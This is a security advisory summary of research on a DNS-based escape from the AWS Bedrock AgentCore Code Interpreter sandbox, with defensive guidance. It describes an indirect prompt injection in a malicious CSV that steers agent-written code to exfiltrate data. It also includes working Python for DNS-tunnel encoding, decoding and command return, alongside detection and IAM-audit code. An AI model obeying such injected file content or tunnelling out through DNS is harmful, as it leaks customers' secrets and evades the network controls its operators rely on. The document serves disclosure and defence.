Pwning AI Code Interpreters in AWS Bedrock AgentCore
Summary:
BeyondTrust’s Phantom Labs research team uncovered an architectural flaw in the AWS Bedrock AgentCore Code Interpreter, a managed service that lets AI agents write and execute code for tasks such as data analysis and calculations. The issue centers on AgentCore's "Sandbox" network mode, which AWS originally documented as providing complete network isolation. The researchers found that although Sandbox mode blocks most outbound traffic, it still permits outbound DNS queries for A and AAAA records, and that this single gap is enough for a threat actor to build a bidirectional command-and-control channel out of the supposedly isolated environment.
The attack chain begins with a malicious CSV file carrying embedded instructions, an indirect prompt injection. When an AI agent processes the file and generates Python code to run inside the Code Interpreter, the embedded content can steer that generated code away from the intended data analysis and toward communicating with an external attacker-controlled DNS server.
The researchers demonstrated a proof-of-concept command-and-control channel by encoding stolen data as chunked ASCII in the subdomain labels of DNS queries to a domain they controlled, establishing a two-way communication path with the isolated environment and circumventing AWS's network controls even in deployments that were supposed to be air-gapped.
Phantom Labs disclosed the flaw to AWS in September 2025. AWS acknowledged the report and deployed an initial fix in November, but rolled it back due to technical issues. In December 2025 AWS declared the behavior "intended functionality rather than a defect" and updated its documentation instead of shipping a patch. The issue was rated CVSS 7.5 (High).
Security Officer Comments:
Once a DNS-based covert channel is established, the impact is bounded only by the IAM permissions attached to the Code Interpreter's execution role. If the agent runs under an overly broad role, attackers can use the channel to execute arbitrary commands, exfiltrate sensitive data, and potentially obtain an interactive reverse shell, all without tripping the network-layer restrictions, because DNS is the one egress path Sandbox mode leaves open. With that channel, an attacker could extract passwords, customer data, Amazon S3 contents, and Secrets Manager values, or even delete infrastructure, if the Code Interpreter's role has been granted excessive privileges.
Beyond direct data theft, the research surfaces compounding attack vectors: prompt injection via malicious inputs (the CSV in the proof of concept) can trick the agent into executing unauthorized code, and the Code Interpreter's runtime depends on 270+ third-party libraries, a supply chain surface in which any compromised library could introduce a backdoor into the execution environment.
Because AWS has declined to patch the underlying behavior, the risk now sits on the customer side of the shared-responsibility model: organizations deploying AgentCore must adapt their own security posture rather than wait for platform-level remediation.
Suggested Corrections:
Organizations running the AWS Bedrock AgentCore Code Interpreter in Sandbox mode should treat that isolation boundary as untrustworthy and take immediate compensating action.
Administrators should inventory all active AgentCore Code Interpreter instances and move those handling critical or sensitive data from Sandbox mode to VPC mode, which routes the interpreter's network traffic through customer-controlled VPC infrastructure. Note that VPC mode does not by itself close the DNS channel; what it changes is that DNS egress now passes through the VPC's resolver, where the customer can log every query and block unwanted domains (for example with Route 53 Resolver query logging and DNS Firewall).
Teams should rigorously audit every IAM role associated with Code Interpreter sessions and apply least-privilege principles, so that the blast radius is small if the DNS channel is exploited: the channel itself only moves bytes, and everything the attacker can reach through it is whatever the execution role already allows.
Deploying DNS sinkholes and deception-based controls (canary records or credentials whose use is alerted on) is recommended to detect covert DNS exfiltration. In practice that means logging every query the interpreter issues and alerting on the tunneling signature the proof of concept exhibits: long, high-entropy subdomain labels and a burst of unique subdomains under a single zone.
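To make both the channel described in the summary and the detection recommended above concrete, here is an added Python example; it is not BeyondTrust's proof-of-concept code and is not taken from the original post. The zone `c2.example`, the sample payload, and the scoring thresholds are assumptions constructed for the example. The encoder shows how a payload is chunked into DNS labels that respect RFC 1035 size limits, the decoder shows what the attacker's authoritative server reassembles from its query log, the A-record helpers show how the return path can carry commands back into the sandbox, and the two detection functions show the per-query and per-zone heuristics a resolver log monitor would apply.

```python
import base64
import math
from collections import defaultdict

# RFC 1035 size limits that any DNS-carried channel must respect.
MAX_LABEL = 63
MAX_NAME = 253

# Hypothetical attacker-controlled zone; an assumption for this example.
C2_ZONE = "c2.example"

# Constructed sample payload standing in for a dumped environment file. Not real credentials.
SAMPLE = b"# constructed sample\n" + b"".join(f"KEY{i}=value-{i}\n".encode() for i in range(60))


def encode_chunks(data: bytes, zone: str = C2_ZONE, label_len: int = 50) -> list[str]:
    """Turn `data` into the ordered list of names a sandboxed process would resolve.

    Base32 keeps every label inside the letters-and-digits alphabet resolvers accept;
    a leading sequence label lets the receiver reorder queries that arrive out of
    order or are retried by an intermediate resolver.
    """
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    names = []
    for seq, start in enumerate(range(0, len(b32), label_len)):
        name = f"{seq}.{b32[start:start + label_len]}.{zone}"
        if len(name) > MAX_NAME or any(len(label) > MAX_LABEL for label in name.split(".")):
            raise ValueError("chunk does not fit in a DNS name")
        names.append(name)
    return names


def decode_chunks(names: list[str], zone: str = C2_ZONE) -> bytes:
    """Reassemble the payload from the query names seen in the authoritative server's log."""
    parts = {}
    for name in names:
        if not name.endswith("." + zone):
            continue  # unrelated traffic hitting the same server
        seq, chunk, *_ = name.split(".")
        parts[int(seq)] = chunk.upper()
    b32 = "".join(parts[i] for i in sorted(parts))
    return base64.b32decode(b32 + "=" * (-len(b32) % 8))


def command_to_a_records(command: str) -> list[str]:
    """Return path: pack a command into the 4-byte payloads of A-record answers."""
    raw = command.encode()
    raw += b"\0" * (-len(raw) % 4)
    return [".".join(str(b) for b in raw[i:i + 4]) for i in range(0, len(raw), 4)]


def a_records_to_command(answers: list[str]) -> str:
    """Sandbox side: the 'IP addresses' it was handed are really command bytes."""
    raw = bytes(int(octet) for ip in answers for octet in ip.split("."))
    return raw.rstrip(b"\0").decode()


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def score_query(name: str) -> int:
    """Per-query heuristic: 0 for typical hostnames, rising for tunnel-like names."""
    labels = name.rstrip(".").split(".")
    subdomain = "".join(labels[:-2])  # approximation: treat the last two labels as the zone
    score = 0
    if len(name) > 60:                       # far longer than ordinary service hostnames
        score += 1
    if max(len(label) for label in labels) > 30:  # single label carrying encoded data
        score += 1
    if shannon_entropy(subdomain) > 3.0:     # encoded data looks random; hostnames do not
        score += 1
    return score


def flag_zones(names: list[str], threshold: int = 10) -> dict[str, int]:
    """Aggregate heuristic: zones that receive many distinct subdomains in one window.

    A tunnel must vary the subdomain on every query to defeat resolver caching,
    so the count of unique subdomains per zone is a strong signal.
    """
    seen = defaultdict(set)
    for name in names:
        labels = name.rstrip(".").split(".")
        seen[".".join(labels[-2:])].add(".".join(labels[:-2]))
    return {zone: len(subs) for zone, subs in seen.items() if len(subs) >= threshold}
```

The per-query score is deliberately coarse so it can run inline on a resolver log stream; the per-zone count is what a DNS sinkhole or Route 53 Resolver query-log analysis would alert on, because a sandbox doing genuine data analysis has no reason to resolve dozens of never-before-seen names under one domain.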
Additionally, organizations should monitor CloudTrail logs for anomalous Code Interpreter invocations, restrict the bedrock-agentcore:InvokeCodeInterpreter and bedrock-agentcore:StartCodeInterpreterSession permissions to explicitly authorized identities only, and review third-party library dependencies in any custom Code Interpreter configuration for supply chain exposure.
Given AWS's position that this behavior is intentional, no vendor patch should be anticipated; customer-side hardening is the primary defensive avenue.
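The IAM review in the two recommendations above is the control that actually bounds the damage, so here is an added Python example of what that audit looks like in code. It is not AWS's or BeyondTrust's code. The three policy documents are constructed for the example (the account ID, bucket, secret name, interpreter resource ARN shape, and the lists of sensitive and destructive actions are all assumptions, and the lists are illustrative rather than exhaustive). The audit flags the three patterns that turn a DNS leak into a breach: wildcard actions, sensitive reads allowed on every resource, and destructive actions reachable from the interpreter role at all.

```python
import fnmatch

# Constructed example policies; assumptions for this example, not AWS-published documents.

# A typical "it just works" execution role: anything the generated code asks for.
OVERLY_BROAD_ROLE = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:*", "secretsmanager:GetSecretValue"], "Resource": "*"},
        {"Effect": "Allow", "Action": "ec2:TerminateInstances", "Resource": "*"},
    ],
}

# Scoped alternative: one bucket prefix, one secret, no destructive actions.
LEAST_PRIVILEGE_ROLE = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:GetObject"],
         "Resource": "arn:aws:s3:::analytics-inputs/*"},
        {"Effect": "Allow", "Action": ["secretsmanager:GetSecretValue"],
         "Resource": "arn:aws:secretsmanager:us-east-1:123456789012:secret:analytics/api-key-*"},
    ],
}

# Caller side: only the agent's runtime identity may start or drive sessions, and only on
# one named interpreter (resource ARN shape assumed for the example).
INTERPRETER_CALLER_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["bedrock-agentcore:StartCodeInterpreterSession",
                    "bedrock-agentcore:InvokeCodeInterpreter"],
         "Resource": "arn:aws:bedrock-agentcore:us-east-1:123456789012:code-interpreter/analytics-interp"},
    ],
}

# Reads whose exposure through an exfil channel is the whole point of the attack. Illustrative.
SENSITIVE_READS = ["s3:GetObject", "s3:ListBucket", "secretsmanager:GetSecretValue",
                   "ssm:GetParameter", "ssm:GetParametersByPath", "dynamodb:Scan", "kms:Decrypt"]
# Representative destructive actions a hijacked interpreter could use. Illustrative.
DESTRUCTIVE = ["ec2:TerminateInstances", "s3:DeleteBucket", "s3:DeleteObject",
               "rds:DeleteDBInstance", "iam:PutRolePolicy", "iam:AttachRolePolicy"]


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _allowed(action: str, policy_actions: list[str]) -> bool:
    # IAM action matching is case-insensitive and the policy side may carry '*' wildcards.
    return any(fnmatch.fnmatchcase(action.lower(), pattern) for pattern in policy_actions)


def audit_policy(policy: dict) -> list[str]:
    """Return findings for Allow statements that widen the blast radius of a compromised
    interpreter session. Handles Action/Resource only; NotAction, NotResource and
    Condition blocks are out of scope for this example and should be reviewed by hand."""
    findings = []
    for i, stmt in enumerate(_as_list(policy.get("Statement", []))):
        if stmt.get("Effect") != "Allow":
            continue
        actions = [a.lower() for a in _as_list(stmt.get("Action", []))]
        unscoped = "*" in _as_list(stmt.get("Resource", []))
        for a in actions:
            if a == "*" or a.endswith(":*"):
                findings.append(f"stmt[{i}]: wildcard action {a!r}")
        if unscoped:
            for s in SENSITIVE_READS:
                if _allowed(s, actions):
                    findings.append(f"stmt[{i}]: {s} allowed on every resource")
        for d in DESTRUCTIVE:
            if _allowed(d, actions):
                findings.append(f"stmt[{i}]: destructive action {d} reachable from the interpreter role")
    return findings
```

Run against the execution role of every interpreter found in the inventory, and treat a non-empty result as a blocker for keeping that interpreter in Sandbox mode: with the DNS channel available, each finding is a concrete thing an attacker can read or break from inside a malicious CSV.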
Link(s):
https://www.beyondtrust.com/blog/entry/pwning-aws-agentcore-code-interpreter